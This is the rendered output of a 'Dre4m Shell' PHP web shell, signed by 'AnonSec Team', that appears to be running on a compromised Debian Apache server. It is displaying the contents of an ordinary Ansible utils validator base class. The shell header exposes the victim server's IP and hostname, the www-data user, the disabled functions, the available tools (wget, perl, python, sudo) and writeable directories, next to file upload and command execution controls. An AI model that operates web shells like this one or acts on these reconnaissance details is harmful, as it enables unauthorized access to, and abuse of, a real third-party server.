Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.137.210.126
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/ansible_collections/ansible/utils/plugins/plugin_utils/base/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib/python3/dist-packages/ansible_collections/ansible/utils/plugins/plugin_utils/base/validate.py
"""
The base class for validator
"""
from __future__ import absolute_import, division, print_function


__metaclass__ = type

import os

from importlib import import_module

from ansible.errors import AnsibleError
from ansible.module_utils._text import to_native, to_text
from ansible.module_utils.six import iteritems

from ansible_collections.ansible.utils.plugins.module_utils.common.argspec_validate import (
    check_argspec,
)
from ansible_collections.ansible.utils.plugins.module_utils.common.utils import to_list


try:
    import yaml

    try:
        from yaml import CSafeLoader as SafeLoader
    except ImportError:
        from yaml import SafeLoader
    HAS_YAML = True
except ImportError:
    HAS_YAML = False


class ValidateBase(object):
    """The base class for data validators
    Provides a  _debug function to normalize debug output
    """

    def __init__(self, data, criteria, engine, plugin_vars=None, kwargs=None):
        self._data = data
        self._criteria = criteria
        self._engine = engine
        self._plugin_vars = plugin_vars if plugin_vars is not None else {}
        self._result = {}
        self._kwargs = kwargs if kwargs is not None else {}
        self._sub_plugin_options = {}

        cref = dict(zip(["corg", "cname", "plugin"], engine.split(".")))
        validatorlib = (
            "ansible_collections.{corg}.{cname}.plugins.sub_plugins.validate.{plugin}".format(
                **cref
            )
        )

        validatordoc = getattr(import_module(validatorlib), "DOCUMENTATION")
        if validatordoc:
            self._set_sub_plugin_options(validatordoc)

    def _set_sub_plugin_options(self, doc):
        params = {}
        try:
            argspec_obj = yaml.load(doc, SafeLoader)
        except Exception as exc:
            raise AnsibleError(
                "Error '{err}' while reading validate plugin {engine} documentation: '{argspec}'".format(
                    err=to_text(exc, errors="surrogate_or_strict"),
                    engine=self._engine,
                    argspec=doc,
                ),
            )
        options = argspec_obj.get("options", {})

        if not options:
            return None

        for option_name, option_value in iteritems(options):
            option_var_name_list = option_value.get("vars", [])
            option_env_name_list = option_value.get("env", [])

            # check if plugin configuration option passed as kwargs
            # valid for lookup, filter, test plugins or pass through
            # variables if supported by the module.
            if option_name in self._kwargs:
                params[option_name] = self._kwargs[option_name]
                continue

            # check if plugin configuration option passed in task vars eg.
            #  vars:
            #  - name: ansible_validate_jsonschema_draft
            #  - name: ansible_validate_jsonschema_draft_type
            if option_var_name_list and (option_name not in params):
                for var_name_entry in to_list(option_var_name_list):
                    if not isinstance(var_name_entry, dict):
                        raise AnsibleError(
                            "invalid type '{var_name_type}' for the value of '{var_name_entry}' option,"
                            " should to be type dict".format(
                                var_name_type=type(var_name_entry),
                                var_name_entry=var_name_entry,
                            ),
                        )
                    var_name = var_name_entry.get("name")
                    if var_name and var_name in self._plugin_vars:
                        params[option_name] = self._plugin_vars[var_name]
                        break

            # check if plugin configuration option as passed as enviornment  eg.
            # env:
            # - name: ANSIBLE_VALIDATE_JSONSCHEMA_DRAFT
            if option_env_name_list and (option_name not in params):
                for env_name_entry in to_list(option_env_name_list):
                    if not isinstance(env_name_entry, dict):
                        raise AnsibleError(
                            "invalid type '{env_name_entry_type}' for the value of '{env_name_entry}' option,"
                            " should to be type dict".format(
                                env_name_entry_type=type(env_name_entry),
                                env_name_entry=env_name_entry,
                            ),
                        )
                    env_name = env_name_entry.get("name")
                    if env_name in os.environ:
                        params[option_name] = os.environ[env_name]
                        break

        valid, argspec_result, updated_params = check_argspec(
            yaml.dump(argspec_obj), self._engine, **params
        )
        if not valid:
            raise AnsibleError(
                "{argspec_result} with errors: {argspec_errors}".format(
                    argspec_result=argspec_result.get("msg"),
                    argspec_errors=argspec_result.get("errors"),
                ),
            )

        if updated_params:
            self._sub_plugin_options = updated_params

    def _get_sub_plugin_options(self, name):
        return self._sub_plugin_options.get(name)


def _load_validator(engine, data, criteria, plugin_vars=None, cls_name="Validate", kwargs=None):
    """
    Load the validate plugin from engine name
    :param engine: Name of the validate engine in format <org-name>.<collection-name>.<validate-plugin>
    :param vars: Variables for validate plugins. The variable information for each validate plugins can
                 be referred in individual plugin documentation.
    :param cls_name: Base class name for validate plugin. Defaults to ``Validate``.
    :param kwargs: The base name of the class for validate plugin
    :return:
    """
    result = {}
    if plugin_vars is None:
        plugin_vars = {}

    if kwargs is None:
        kwargs = {}

    if len(engine.split(".")) != 3:
        result["failed"] = True
        result["msg"] = "Parser name should be provided as a full name including collection"
        return None, result

    cref = dict(zip(["corg", "cname", "plugin"], engine.split(".")))
    validatorlib = (
        "ansible_collections.{corg}.{cname}.plugins.sub_plugins.validate.{plugin}".format(**cref)
    )

    try:
        validatorcls = getattr(import_module(validatorlib), cls_name)
        validator = validatorcls(
            data=data,
            criteria=criteria,
            engine=engine,
            plugin_vars=plugin_vars,
            kwargs=kwargs,
        )
        return validator, result
    except Exception as exc:
        result["failed"] = True
        result[
            "msg"
        ] = "For engine '{engine}' error loading the corresponding validate plugin: {err}".format(
            engine=engine,
            err=to_native(exc),
        )
        return None, result

Anon7 - 2022
AnonSec Team